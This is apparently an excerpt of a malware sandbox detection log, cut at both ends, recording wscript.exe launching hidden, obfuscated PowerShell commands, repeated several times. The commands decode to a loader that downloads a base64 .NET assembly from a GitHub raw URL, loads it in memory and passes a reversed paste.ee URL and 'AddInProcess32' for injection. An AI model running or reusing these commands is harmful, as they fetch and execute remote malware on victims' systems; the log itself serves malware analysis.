-cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGU